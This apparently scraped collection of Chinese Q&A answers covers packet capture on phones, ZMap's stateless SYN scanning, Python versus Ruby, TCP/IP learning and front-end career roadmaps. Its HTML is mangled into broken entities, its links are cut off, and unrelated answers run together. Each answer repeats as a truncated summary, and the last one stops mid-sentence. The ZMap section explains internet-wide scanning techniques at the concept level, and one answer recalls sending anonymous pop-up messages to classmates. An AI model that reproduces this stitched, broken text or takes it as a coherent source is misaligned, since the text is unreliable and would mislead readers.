bitShark」安卓版&i class=&icon-external&&&/i&&/a&了,非常成功,保存的pcap文件可以手机直接查看,也可转到电脑中用&a class=& wrap external& href=&///?target=http%3A//www.wireshark.org/download.html& target=&_blank& rel=&nofollow noreferrer&&Wireshark&i class=&icon-external&&&/i&&/a&分析。&br&&img data-rawheight=&512& data-rawwidth=&307& src=&/294e078a16bd4feb02b56d_b.jpg& class=&content_image& width=&307&&&img data-rawheight=&512& data-rawwidth=&307& src=&/5ac142fec1c0df305c82d0d66fcd1377_b.jpg& class=&content_image& width=&307&&&img data-rawheight=&512& data-rawwidth=&307& src=&/c9ddedb1a13cbf_b.jpg& class=&content_image& width=&307&&&img data-rawheight=&512& data-rawwidth=&307& src=&/dc20c104fcfd030d5d175a_b.jpg& class=&content_image& width=&307&&
和其他朋友的帮助,Wi.cap. Network sniffer Pro要付费,所以在国内无法下载,DEMO版的运行正常,但看不到数据内容。在网上找到用了D版(结果总…
如果是用于测试,方便的做法是笔记本连网线, 将无线共享出来, Android 或者iOS 连接PC 的无线。 在PC 上安装Wireshark 或者Network Monitor。 个人推荐Network Monitor, 微软出品。功能比较强大, 不光是HTTP的请求,几乎支持所有常见的各层网络协议解析。
如果是用于测试,方便的做法是笔记本连网线, 将无线共享出来, Android 或者iOS 连接PC 的无线。 在PC 上安装Wireshark 或者Network Monitor。 个人推荐Network Monitor, 微软出品。功能比较强大, 不光是HTTP的请求,几乎支持所有常见的各层网络协议解析。
不知道Chrome插件,不过知道一个网站。&br&&a href=&///?target=http%3A//www.clipconverter.cc/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&YouTube Video Converter and Download&i class=&icon-external&&&/i&&/a&&br&这个网站贴上Youtube的视频地址就可以了,可选择各种清晰度和格式下载。
不知道Chrome插件,不过知道一个网站。这个网站贴上Youtube的视频地址就可以了,可选择各种清晰度和格式下载。
Firefox 有各种64为的第三方编译版本,表现的都还不错。&br&&a class=& wrap external& href=&///?target=http%3A///archives/1933& target=&_blank& rel=&nofollow noreferrer&&Firefox浏览器64位版本集合(lawlietfox、Pale Moon、Cyberfox、Waterfox)&i class=&icon-external&&&/i&&/a&
Firefox 有各种64为的第三方编译版本,表现的都还不错。
&a href=&///?target=https%3A///makinacorpus/spynner& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&makinacorpus/spynner 路 GitHub&i class=&icon-external&&&/i&&/a&&br&这个python库其实是完整的浏览器,非常强大。需要pyqt和x11,windows下可以使用cygwin。
这个python库其实是完整的浏览器,非常强大。需要pyqt和x11,windows下可以使用cygwin。
传统上的TCP/IP需要“三次握手”报文交互,在此期间需要维持记录着与对方交互的状态。&br&这种状态记录量是巨大的,占用内存和CPU资源很大。&br&而ZMap索性就不进行三次握手,只进行第一个SYN,然后等待对方回复SYN-ACK,之后即RST取消连接。这样肯定会因网络原因丢失一定比例的数据,根据其实验,这个比例在2%左右。&br&以上策略,在nmap中也有实现,即其TCP SYN扫描方式。&br&关键性的问题出现在对回复的SYN-ACK进行seq number的校验。传统上就需要记录状态。&br&而ZMap是将对方receiver ip地址进行hash,将其处理保存到了sender port和seq number两个字段中,当SYN-ACK回来的时候,就可以根据sender ip、receiver port、ack number这些字段进行校验。&br&因此避免了状态存储,接近了网络带宽极限。&br&&img src=&/e55c15b5d58a3e04572e_b.jpg& data-rawwidth=&939& data-rawheight=&698& class=&origin_image zh-lightbox-thumb& width=&939& data-original=&/e55c15b5d58a3e04572e_r.jpg&&&br&性能方面:&br&单台服务器,扫描整个IPv4地址空间,耗时45分钟,将所接&b&1Gb的带宽&/b&占用了97%。&br&&img src=&/fce61b8c480a8f44e01de83a309fc54b_b.jpg& data-rawwidth=&947& data-rawheight=&704& class=&origin_image zh-lightbox-thumb& width=&947& data-original=&/fce61b8c480a8f44e01de83a309fc54b_r.jpg&&不仅速度上比Nmap(TCP SYN模式)高不少,而且其设计的无状态机制,让其搜索成功的覆盖率也增加了。&br&&img src=&/e5df4c569f80_b.jpg& data-rawwidth=&943& data-rawheight=&711& class=&origin_image zh-lightbox-thumb& width=&943& data-original=&/e5df4c569f80_r.jpg&&&br&与Nmap等已有系统对比:&br&NMap是一个通用网络监测工具,可以适用于不同协议、不同范围的测试。&br&而ZMap专做单端口、大范围的网络监测。&br&这也让ZMap能在这单一领域做很多优化。&br&&img src=&/1c1115f8bea77ad5c323eeab0032395d_b.jpg& data-rawwidth=&949& data-rawheight=&704& class=&origin_image zh-lightbox-thumb& width=&949& data-original=&/1c1115f8bea77ad5c323eeab0032395d_r.jpg&&&br&&a href=&///?target=https%3A//zmap.io/paper.pdf& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&zmap.io/paper.pdf&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
传统上的TCP/IP需要“三次握手”报文交互,在此期间需要维持记录着与对方交互的状态。这种状态记录量是巨大的,占用内存和CPU资源很大。而ZMap索性就不进行三次握手,只进行第一个SYN,然后等待对方回复SYN-ACK,之后即RST取消连接。这样肯定会因网络原因丢…
抛个砖引块玉。
&br& 个人觉得任何一门语言想要学好,最重要的还是打好基础。夯实了基础才能跳的更高,走的更远。前端语言学习也是这样,不能仅仅是工程导向的的学习,用到什么了才去找什么(搜索式学习),那样不能形成一个系统的知识框架。
&br&## Javascript: &br&&br&有些常见概念要搞清楚:继承,闭包,原型链,作用域链,事件流等。&br&&br&进阶:可以了解一些函数或操作的内部机制:eg,&br&* `new`操作符的工作机制(The &b&new&/b& Operator &a href=&///?target=http%3A//d.pr/UfZH& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/UfZH&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&[[Construct]]&a href=&///?target=http%3A//d.pr/8C4V& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/8C4V&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&)&br&* 创建一个函数的内部机制&br&* instanceof的工作机制,衍生问题如何判断一个变量是否是数组 &a href=&///?target=http%3A//d.pr/PUVX& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/PUVX&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&* this的取值&br&* __proto__ 和 prototype
&a href=&///?target=http%3A//d.pr/owct& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[[Prototype]] and prototype&i class=&icon-external&&&/i&&/a&&br&&br&## CSS:&br&&br&1、盒模型,标准模式和非标准模式下盒模型渲染会有什么不同
&br&2、常见的定位方式有哪些,relative absolute fixed定位有哪些不同 &br&3、常见的浏览器兼容问题有哪些,如IE的hasLayout是怎么个东西,常用哪些方式来出触发hasLayout;z-index在IE和其它浏览器中有啥不同。还有著名的双边距bug,li中浮动元素bug等,进阶的可以了解BFC及其衍生的一系列问题。&br&4、常用的CSS Hack&br&&br& 下面这些书可以看一下:
&br& ========
&br& Javascript高级程序设计
&br& Javascript语言精粹
&br& 高性能Javascript
&br& Javascript权威指南
&br& CSS Mastery
&br& CSS权威指南
&br& ========
抛个砖引块玉。 ==== 个人觉得任何一门语言想要学好,最重要的还是打好基础。夯实了基础才能跳的更高,走的更远。前端语言学习也是这样,不能仅仅是工程导向的的学习,用到什么了才去找什么(搜索式学习),那样不能形成一个系统的知识框架。 ## Javascript:…
看到这个热烈的讨论, 想谈一谈其他的观点, 希望think out of box&br&&br&我在06年左右开始放弃自己十多年的C++转python, 当时我和周围的C++程序员聊, 大家都是&呵呵&, 没有真的用的. 如今我有机会见到当年的老同事, 他们都或多或少是python的用户, 这让我很欣慰.&br&&br&我想要讲的, 就是这个世界的另外一面. 我们必须承认, C C++ 和 Java的用户远远多于 php python 和 ruby的用户, 这些用户其实完全不在乎社区聚会, 有的完全不了解web开发, 甚至有的连open source都没有听说过, 更别谈hacker精神了.&br&&br&同理, 我相信, 用这三种语言开发web的用户, 肯定是php最多, 如果是ruby或者python, 我还是觉得ruby用户多一点. 可以不靠谱的说, 用ruby的用户就是rails用户, 但是在python世界中, 情况完全不一样.&br&&br&我曾经和一个朋友聊天, 我说我是python开发者, 他说他也是. 我问他你用什么框架开发? 他说他从来都不玩web, 他只知道用python开发自动测试脚本... &br&&br&不可否认java, php, ruby和python是因为web开发水涨船高, 同样的情况发生在objc和iOS的关系上. C和硬件开发, Java和企业级, 造就了那些编程语言的统计排名的区别. 但是真正在广大的现实生活中找一个C++程序员, 你有机会遇到一些学技术只是混口饭吃的人, 当然他们的C++水平大大的高于你的水平, 只是他们完全不存在互联网世界.&br&&br&在谈谈最后这几种语言, 实际上需要谈的也只有ruby和python这两种&br&ruby以web流行, 现在开始跳出这个框子, 进入到其他领域, 比如homebrew, watir. 同时我们不得不承认rails已经开始臃肿, 很多人开始转向ruby的其他微框架.&br&&br&我的观点是, ruby语法很优美, 干活很快. 但是它有没有帮助工程师解决很多本质的问题? 很多人通过rails学会使用jquery. 没错, 通过gem, 但是在这样的快捷方式安装下, 他甚至不知道jquery的js文件放在哪里. 我没有时间去仔细研究rails给出更多的例子, 但是无论从rails的教程, 还是视频, 几分钟做一个博客... 都可以看出他们用&简单&作为营销方式, 让新用户跳进这个坑, 后来才发现坑有点深. 这与微软的开发技术很像, 用visual studio这样豪华的编辑器, 告诉你鼠标点点就能编程, 可惜结果完全不是这样. &br&&br&这个很值得同行学习, 我在向朋友推荐技术的时候, 也发现了这样的问题, 告诉他们这个简单, 是大多数人学习的动力. 当年Java不也是那么吹的, 结果当mac的架构从powerpc编程intel的时候, 用eclipse的同事就开始骂人了: 不是说一次编译到处执行吗? 骗人的, 都是骗人的!&br&&br&我不想说太多关于其他语言的坏话, 或许我已经说了, 好吧原谅我讲点您可能不喜欢的事实. python也有很多坑, 安装个mysql-python就有可能遇到很多问题. python社区从前几年的热火朝天, 到现在似乎帖子不多, 是因为已经没有很多问题需要热烈讨论了. 从python2.3 2.4的时候, 大家发现了这么一个简单的(近似)全功能语言, 已经尝试着去了解它, 了解它的标准库, 以及第三方库. 那些知识都在邮件列表里面, 只要搜索就可以获得. 当然我还是看到某些qq群里面有人在问类似的问题, 他们甚至希望可以把自己的工作完全交给群里的其他用户解决, 其他的我就不说了.&br&&br&我认为python的好处有两点, 第一是对于那些不具有geek精神的人, 它是一个简单的解决方案. 这些人从来不混社区, 从来不钻研, 只需要解决问题的时候找到一段代码块, 读也不读, 贴上去测试, 完事... 这个世界上有很多这样的人, 菲律宾这样的程序员特别多.&br&&br&第二, 就是对于非常geek的人, 比如想instergam, Dropbox这样的团队, 不仅仅是geek, 而且要求做事情有美感, 追求pythonic的人, python这种能忽悠菜鸟的玩意, 居然也可以被一流团队在工业级别的生产环境使用, 这太没天理了.&br&&br&观点表达完毕&br&&br&python的社区还是有很多事情要做的, 比如他们把很多web框架都抄了一遍, 各种思想的都有, 比如最早的zope, z-object系统的思想还是很有看头的, django可以说对应rails, 还有TG和Pylons, 还有tornado这样神奇的东西ruby社区还没有吧, 只能对应nodejs了. 但是你们发现了没有, python的这些framework基本上没有screen cast, 我晕你们到底在不在营销你们的framework? tornado的文档居然那么简单, 居然给你link让你直接去读代码?!&br&&br&还有一些其他领域的东西, 比如和R语言对抗的pandas, 做统计的. 还有cocos2d, 最早是用python实现的原型, 后来port到iOS火了半边天, 不过他们的文档也是比较烂, 有没有screen cast也不好说, 应该很容易被包装过的产品打败吧.&br&&br&但是, 我认为python最重要的, 还是在与背后的pythonic思想, zen of python. 我相信如果一个成熟的工程师, 能搞定大部分事情是第一步, 理解事物背后的规律并且能用优美的方式解决才是常态, 之后就会按照pythonic的方法, 优雅的搞定所有的工作. pythonic是hacker精神的延续. &br&&br&同时有经验的工程师也不会陷入某种狂热或者崇拜之中, 你说一个东西好, 那么我也要看一看才能相信你所说的. 那些在java, php里面投入很多的工程师, 也或多或少的达到了pythonic的境界.&br&&br&最后我也很能理解tornado文档的那种感觉, MVC都不懂的初学者你就别来了, 去学个django或者rails入门吧, 我没多少文档给你, 不懂去读代码吧.
看到这个热烈的讨论, 想谈一谈其他的观点, 希望think out of box我在06年左右开始放弃自己十多年的C++转python, 当时我和周围的C++程序员聊, 大家都是"呵呵", 没有真的用的. 如今我有机会见到当年的老同事, 他们都或多或少是python的用户, 这让我很欣慰.我…
&b&抓包&/b&&br&先从熟悉的下手,HTTP,FTP。&br&&b&封装包&/b& &br&自己封装包,和现有协议通信。TCP/IP协议作为一个底层协议,不仅可以编写聊天程序,很多高层协议都是基于TCP/IP编写的。&br&自己造轮子,这样也有助于理解其它协议,比如连接、查询MySQL(用Socekt函数而不是库函数),自己封装一个memched函数库…&br&以前我大学时用perl发送“飞鸽传书”包,经常上课的时候同学们集体收到弹出信息,却不知道发送者是谁,很有成就感。&b&如果你做已经事没有成就感,就很快会失去动力。&/b&&br&&b&他山之石&/b&&br&经常去github。&br&&b&源码&/b&&br&读读TCP/IP协议的实现代码,去翻翻 linux 1.0 源码。
抓包先从熟悉的下手,HTTP,FTP。封装包 自己封装包,和现有协议通信。TCP/IP协议作为一个底层协议,不仅可以编写聊天程序,很多高层协议都是基于TCP/IP编写的。自己造轮子,这样也有助于理解其它协议,比如连接、查询MySQL(用Socekt函数而不是库函数),…
首先你已经不是零基础了。&br&&br&其实这种事情没有什么捷径,亲自动手,一步一步来即可,不能好高骛远。&br&&br&Step 1: 用 HTML + CSS 模仿几个漂亮的静态页面。当你看到现在大部分的网页都觉得能大概猜到怎样做,并且花时间真的能做出来的时候,即可进入下一步。注意,这个时候请你不要管浏览器兼容性或者太过注意代码的优雅结构,因为没必要。做到能兼容现代浏览器,内容和样式基本完全分离即可。这大概需要半个月到一个月的学习时间。&br&&br&Step 2: 用 HTML + CSS + JS 写几个有交互的页面。例如,你可以写一个漂亮的注册页面,它能够验证各种输入是否符合条件并且有一个用原生 JS 实现的日期选择器(Date Picker)。或者,写一个漂亮的,有动画的相册。注意,这个阶段请使用原生 JavaScript。同样的,兼容现代浏览器即可。这大概需要半个月的学习时间。&br&&br&Step 3: 入门一门后端语言。按照你的情况,就 php 吧。有了上面的经验,php 入门之后,相信你能够做一个漂亮的无用户留言版了。请把数据存贮在文件中,因为你还没有学习 SQL 嘛。这大概需要半个月的时间,如果你学习能力强,一个星期也不是没有可能。&br&&br&Step 4: 入门一个关系数据库。比如说 MySQL。DDL 和 CRUD ,请一定要熟练。恩,这个阶段不要谈什么优化,那是扯淡。现在,你大概可以做一个多用户的博客程序了。这大概需要半个月的时间。&br&&br&你看,两个半月不到你就可以成为一个初级的 Web 开发者了。博客做好之后,你可以尝试造更多的轮子。比如:带简单的用户权限的论坛程序、简单的记账工具,等等,做你喜欢做的任何小程序都行。在这个过程中,你会变成一个熟练的初级程序员,或者,你为了偷懒,会学会 jQuery,Smarty 等框架。&br&&br&有一天,你发现你靠写小程序提高不了水平了。接下来就要学习真正的干货了。&br&&ul&&li&学习 C 语言。别问我为什么,我就是觉得一个程序员应该要学过 C 语言,牛逼不牛逼是另外一会事儿,况且很多书都是用的 C 语言描述。别光学语法,弄清编译是什么,链接是什么,指针是又怎么一会事儿。&br&&/li&&li&学习数据结构和简单的算法。你看,你学完 C 语言就能学数据结构和算法了,我难以想象用 php 来描述数据结构和算法会有多么地奇怪。如果你觉得学了之后还是不知道数据结构究竟是什么,有什么用,那证明你还没有真的学到。&br&&/li&&li&学习一门面向对象的静态编程语言。推荐 Java。学得有多好,就看你花了多少时间了。请务必仔细阅读各类相关书籍,深刻领会面向对象的重要编程思想(不过,切忌迷信面向对象编程)。&br&&/li&&li&学习操作系统和计算机网络。至少一些基本的概念需要弄清楚,具体的细节,没有必要过于纠结。&/li&&/ul&Okay...以上都可划为「不求甚解」的阶段,接下来就可以选一个方向(前端,或者后端)「求甚解」了。在「求甚解」的阶段里,我这里就不细说了,也没法儿细说,并且你到了这个阶段,一般是不需要别人告诉你需要学什么了。所以,我只说在进入这个阶段之前,或者刚刚进入这个阶段时,最好去做的一些事情:&br&&ul&&li&看书或文档抛弃中文译本,借助各种工具阅读英文原版。&br&&/li&&li&学习使用 Unix-like 系统。&br&&/li&&li&学会提问[1]。&br&&/li&&li&订阅科技博客,了解业界正在发生什么事情。&/li&&/ul&Happy hacking!&br&&br&[1] 提问的智慧:&a href=&///?target=http%3A///smart-questions/smart-questions-zh.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/smart-questions&/span&&span class=&invisible&&/smart-questions-zh.html&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
首先你已经不是零基础了。其实这种事情没有什么捷径,亲自动手,一步一步来即可,不能好高骛远。Step 1: 用 HTML + CSS 模仿几个漂亮的静态页面。当你看到现在大部分的网页都觉得能大概猜到怎样做,并且花时间真的能做出来的时候,即可进入下一步。注意,这…
跟着&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Learn to code&i class=&icon-external&&&/i&&/a&的步骤学,它里面选初学者,第一个开始是HTML&CSS,接着是JAVASCRIP,如果不会做里面的题目可以问论坛,同时可结合&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&W3Schools Online Web Tutorials&i class=&icon-external&&&/i&&/a&进行补充学习。另外W3School还有中文版的。
跟着的步骤学,它里面选初学者,第一个开始是HTML&CSS,接着是JAVASCRIP,如果不会做里面的题目可以问论坛,同时可结合进行补充学习。另外W3School还有中文版的。
如果是编程零基础,我的建议是:&ol&&li&HTML & CSS
&/li&&li&JavaScript
&/li&&li&服务端语言(php,python等)
&/li&&/ol&这三者的学习深度可以以w3schools的深度为准,当三者已经有了一定基础,结合起来能写出一些成品时,再根据自己的兴趣选择1,2,3三个方向中的一个进行深入学习(当然,你如果有极客精神不妨通吃)。这三方面的深入学习大致包含:&ol&&li&web标准,浏览器兼容,架构等&/li&&li&编程的基础知识(算法,设计模式等),js特性、浏览器特性深入学习&/li&&li&除编程的基础知识外等,另外还包含对操作系统的学习(进程、文件、网络等等)&/li&&/ol&
如果是编程零基础,我的建议是:HTML & CSS JavaScript 服务端语言(php,python等) 这三者的学习深度可以以w3schools的深度为准,当三者已经有了一定基础,结合起来能写出一些成品时,再根据自己的兴趣选择1,2,3三个方向中的一个进行深入学习(当然,你…
&b&为了能让大家第一眼阅读到最新内容,更新就写到上面了。&/b&&br&&br&这篇文章写于12年年初,到现在有三年多了,截至到现在赞同数494,被收藏 1199 次,不算多。问题被编辑多次之后,原回答已经不是很符合意境了,所以我还是继续补充了。&br&&br&&b&技术背景:可能擅长php+js&br&&/b&&br&&b&日续写....&/b&&br&&br&我极其不赞同那些发一大篇大而全知识结构图,那种回答然并卵,对于普遍大学生来说,太技术的东西他们根本看不懂,在我看来&b&大学生更重要的是培养习惯和拓宽视野。&/b&&br&&br&&b&题主提到的是大学时期的规划,那就说说大学可以干的一些事情。&/b&内容不局限在某个特定职位,你可能做不到全部,这些能力也不可能一蹴而就,但只要坚持做到几点,对以后职业生涯是受益匪浅。&br&&br&&b&先学会科学上网再说&/b&&br&之前培训新人给他们分享过很多文章链接他们都访问不了,沟通大受局限,因此我把科学上网摆在第一位,之后分享的链接有部分人可能无法访问,需自学科学上网,这里就不多说了。&br&&br&&b&学好英语&/b&&br&除了团队内部沟通用中文外,大量时间都是在和英文打交道。从事技术不会英语等同于文盲,尤其在技术进阶阶段英语的重要性毋庸置疑。三点:&br&1. 读懂英文技术文档(文档的重要性和时效性超过书籍)。&br&2. 可以用英文进行交流(社交网络 & IM等聊天工具)。&br&3. 读懂代码(除英文外,还需要懂编程语言)。&br&&br&&b&从书本里解脱出来&/b&&br&目前市面上的现有的所有技术书籍质量普遍不高,相比较技术书籍,我更愿意新人学会看文档,甚至到达一定水准,直接看代码就知道该怎么用一些技术了。&br&&br&说一些日常发现的比较多的问题,我发现即使很多文档写的条理清晰、Demo齐全,新人读起来还是非常吃力。一方面某些技术的涵盖的范围很广,新人知识结构比较片面,很难理解一些概念;另一方面新人大多是看书和课后习题出来的,文档读的太少了,不能理解文档的意图。&br&&br&分享两个我至今还一直在参考的文档网站:&br&&br&入门级:&a href=&///?target=http%3A//.cn/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&w3school 在线教程&i class=&icon-external&&&/i&&/a&、&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&& 的页面&i class=&icon-external&&&/i&&/a&&br&参考书:&a href=&///?target=https%3A//developer.mozilla.org/zh-CN/docs/Web& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Web 技术文档&i class=&icon-external&&&/i&&/a&&br&&br&Demo平台,你可以在这里运行你的Demo。&br&&br&&a href=&///?target=http%3A//codepen.io/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&codepen.io/&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=http%3A//jsfiddle.net/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Create a new fiddle&i class=&icon-external&&&/i&&/a&&br&&b&&br&你要了解的两个窗口:浏览器和编辑器&/b&&br&&br&&b&1. 浏览器&/b&&br&&b&Safari &/b&Webkit&br&&b&Chrome &/b&Blink(Webkit分支)&br&&b&Opera &/b&Webkit,早先的Presto就不拿来说了。&br&&b&Firefox &/b&Gecko&br&&b&IE &/b&Trident&br&&br&&b&2. 编辑器&/b&&br&&b&Sublime Text&/b& 首推&br&&br&&b&vim/emacs&/b& 太极端了&br&&b&IDE&/b& 太笨重了&br&&br&浏览器 & 编辑器 会是你以后最重要的两个伙伴了,学会和她们相处,对工作效率的提升不是一丁半点。怎么相处?那是你的事儿了。&br&&br&&b&加入校内Web团队,找兼职工作或者去有意的公司实习&/b&。&br&不同团队,不同项目所用到的技术栈都不一样,你可以从校园内部开始,逐渐把目光放的更长远,你可以关注一些意向公司的动态,了解他们的需求,可以关注他们的微博,你可以用寒暑假的时间去不同公司感受前端在不同公司的不同之处,对于拓宽视野非常有帮助。&br&&br&&b&关注开源项目、技术社区和技术博客。&/b&&br&&br&推荐几个我平时关注的平台:&br&&br&&a href=&///?target=https%3A//& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&GitHub · Where software is built&i class=&icon-external&&&/i&&/a&&br&Github可以是搜索引擎、可以是社交平台、可以是项目托管平台。你可以近距离的看到世界级的精英都怎么写代码的。我平时大量时间都泡在Github上看代码了,我的编程水平也不高,但是我知道怎么去欣赏一个项目,这是一种享受,跟看了一本小说一样。&br&&br&多说几句:我很少看技术书籍,我学编程不是从语法开始的,我喜欢直接看整体项目,然后自我感悟。再带着问题去Google解决自己的疑问。&br&&br&&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Stack Overflow&i class=&icon-external&&&/i&&/a&&br&除了Github外,Stack Overflow也帮我解决了诸多平时项目中遇到的坑。&br&&br&&a href=&///?target=https%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&CSS-Tricks&i class=&icon-external&&&/i&&/a&&br&不得不说CSS Tricks上有很多高质量的文章,但对我自己来说,我更多的是来凑个热闹,看看文章,看看评论,学习下英文不亦乐乎。&br&&br&&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&SegmentFault&i class=&icon-external&&&/i&&/a&&br&除了看每周精选外,我很少在SegmentFault上搜东西。但是作为从Typecho关注过来的人,还是特别希望SegmentFault能有好发展。&br&&br&&a href=&///?target=http%3A///blog/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&阮一峰的网络日志&i class=&icon-external&&&/i&&/a&&br&&a href=&///?target=https%3A///ruanyf& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&ruanyf (Ruan YiFeng) · GitHub&i class=&icon-external&&&/i&&/a&&br&国内技术博客第一人,无他。&br&&br&&b&参与开源项目的维护与开发&/b&&br&&br&到达这个层次的大学生较少,这个阶段你会学会git的精髓。&br&&br&&br&&b&--------------------------------------------------------------------&/b&&br&&br&&b&日续写......&/b&&br&&br&这个话题实在太大,我尝试分几点把这个大话题讲的稍微明白一些。&br&&br&&b&前端根据人的特点可以分为两个流派:切图流、技术流。&/b&&br&&br&一般来说懂平面设计的人做前端切图会更细腻一些,懂设计的前端也只在切图时候会体现出一些优势,对于重视技术流的前端公司,懂不懂设计对他们来说不是重点。技术流派甚至都不会切图,他们的大把时间都消耗在专研技术里了,什么技术,这些之后再说。&br&&br&&br&&b&一、切图流&/b&&br&&br&切图需要熟悉PS和AI的切图技能,简单说就是把设计稿的web元素导出为jpg/png/svg等等,结合这些元素把设计稿转化成web页面。切图是个非常需要耐心的工作,需要把设计稿&b&精确&/b&的转化成页面,需要解决浏览器的各种&b&兼容性&/b&问题、&b&响应&/b&问题。&b&如果你只是在国内某些大包大揽的建站公司做切图,那是灾难,而且会养成很多陋习。&/b&如果有幸和国外的优秀的设计团队合作,会是一种享受。但是设计师们对页面细节要求非常苛刻,如果你只懂得HTML+CSS技能根本不足以支撑你完成一份高质量的切图。&br&&br&国内大公司前端都比较技术流,没有那么多精致的设计稿让你切,国内建站公司的切图又太垃圾,所以如果做切图去一些面向国外的小团队体验一下吧。&br&&br&&b&切图的基础工作:PSD2HTML和AI2HTML,PSD2CMS,PSD2BACKEND。&/b&&br&&br&&b&PSD2HTML和AI2HTML&/b&:主要负责把设计稿精确的转化成html页面。&br&&b&PSD2CMS&/b&:直接转化为cms的主题,需要比较懂cms系统,比如WordPress,Drupal之类。&br&&b&PSD2BACKEND&/b&:直接套到某个后端语言的框架里。这个难度级别比较高。&br&&br&在一个专业的团队里,切图主要负责的工作就是&b&PSD2HTML和AI2HTML,&/b&这一类人一般水平比较局限,需要掌握基本的html+css技能,如果懂js就更好了。&br&相比较 &b&PSD2CMS & PSD2BACKEND &/b&一般都是偏fullstack的比较多,多见于全职soho。&br&&br&&b&切图的另一项重点:&/b&&b&代表&/b&&b&页面效果&/b&&b&的CSS3和JQuery及其各类插件。&/b&&br&&br&一般这类设计师都比较时尚,有些设计团队是从flash转来的,对页面效果特别有追求。跟这类设计师合作是个技术活。&br&&br&页面效果一般来说&br&&br&CSS3中比较简单的transition和transform ,难的有keyiframes的animation,最难的是CSS3和JQuery的结合,需要应用到各种插件等等。深坑,涉及面太广暂不深入讨论了,时间原因,以后有空整理几套给力的例子出来大家看看。&br&&br&&b&切图工作者的进阶技能&/b&&br&&br&HTML结构和页面模块化。&br&在此基础上了解怎么使用Sass/Stylus/Less等CSS预编译器。&br&&br&切图能好这点技能已经相当牛逼了。&br&&br&&br&&b&二、技术流&/b&&br&&br&&b&包管理器:&/b&npm、bower&br&&b&前端构建工具:&/b&grunt、gulp和它们各自的插件&br&&b&模块加载&/b&&b&器&/b&&b&:&/b&requirejs、webpack、systemjs&br&&b&代码规范:&/b&ES5/ES6、Commonjs、AMD&br&&b&语法糖:&/b&Coffeescript、Typescript、Dart...&br&&b&CSS预编译器:&/b&Sass、Stylus、Less&br&&b&DOM操作:&/b&JQuery...&br&&b&前端&/b&&b&框架:&/b&Backbone、Ember、Angular、Flux(React)&br&&b&后端框架:&/b&express、meteor&br&&b&模版引擎:&/b&handlebars、swig、nunjucks、ejs、jade...&br&&b&协议:&/b&http、websocket...&br&&br&作为一个技术流怎能不熟练各种技术的单词拼写?&br&&br&上面总结了这么多,不是想说我多么懂这些技术,而是表现了现阶段的前端发展真TM混乱,这是后端开发无法理解的事儿。&br&&br&和其他脚本语言不同,JavaScript的特点总结三点:&br&&br&1. Callback&br&2. Event&br&3. Promise&br&&br&留空补充....&br&&br&&b&Webapp时代怎能不提restful?&br&&/b&&br&这部分需要学习了解几种网络协议:&br&&br&1. http&br&2. websocket&br&&br&&br&&b&项目托管&/b&&br&&br&Git&br&&br&时间有限,就先写这么多了.....&br&&br&--------------------------------------------------------------------------------------&br&&br&前端是近几年发展起来的职业,很多人对前端的认识比较模糊,因此开篇我有必要介绍一番,前端(这里的前端是大众口中的前端)偏美工是视觉设计,前端偏用户是用户体验,前端偏目标导向是交互设计,前端偏技术才是大家口中的前端。和前端有关系的几样技术:PS,DW,FL,HTML+CSS+JS,看过很多人给前端的建议也差不多是学习这几种软件和HTML+CSS+JS等等了,不过我却觉得大家在把前端往一个误区引导。为什么呢?听我慢慢解释。&br&先来说说和前端有联系的几个职位:前端工程师、视觉设计师、用户研究工程师、交互设计师。我用一个简单的例子来分析:我们都经常在一些社区评论留言,留言的表面过程:打开留言页面——输入留言内容——点击提交按钮——留言显示在留言列表上。我这里不解释这个过程的实现原理。&br&&br&---日修改---&br&&strong&前端工程师:留言框代码怎么写?&/strong&留言框的显示、一些JS动态效果的显示(可能涉及异步请求)。&br&&strong&视觉设计师:什么样的留言框最漂亮?&/strong&怎么布局?用什么色彩还是需要做一些纹理?&br&&strong&用户研究工程师:用户怎么留言最舒服?&/strong&很多人可能会和用户体验师混淆在一起,其实这两种人有着本质的区别,用户研究更侧重的是方法论,注重问卷调查访谈等等行为来了解用户的潜在行为习惯,而用户体验是一种行为,更侧重的是体验之后的实际感受。&br&&strong&交互设计师:留言过程中的反馈?&/strong&输入错误后的提示,留言成功后的反馈等等。交互设计可以理解为人机对话,交互设计侧重和用户交流之后,引导用户有效操作,比如鼠标放在超链接上字体变颜色,有title提示,用户点击超链接,我们就可以称这次交互是成功的,因此交互设计的重点在于目标向导。&br&&br&---修改结束---&br&&br&这些分工十分细微,如果留言本是一个项目的话,需要从几个不同的角度来分析留言框,一个大型的项目比如社交网站、门户网站、行业网站这些职位都必须明确分工才能把整个项目做好,但是实际上即使条理清晰在项目开展过程中还会出现诸多意想不到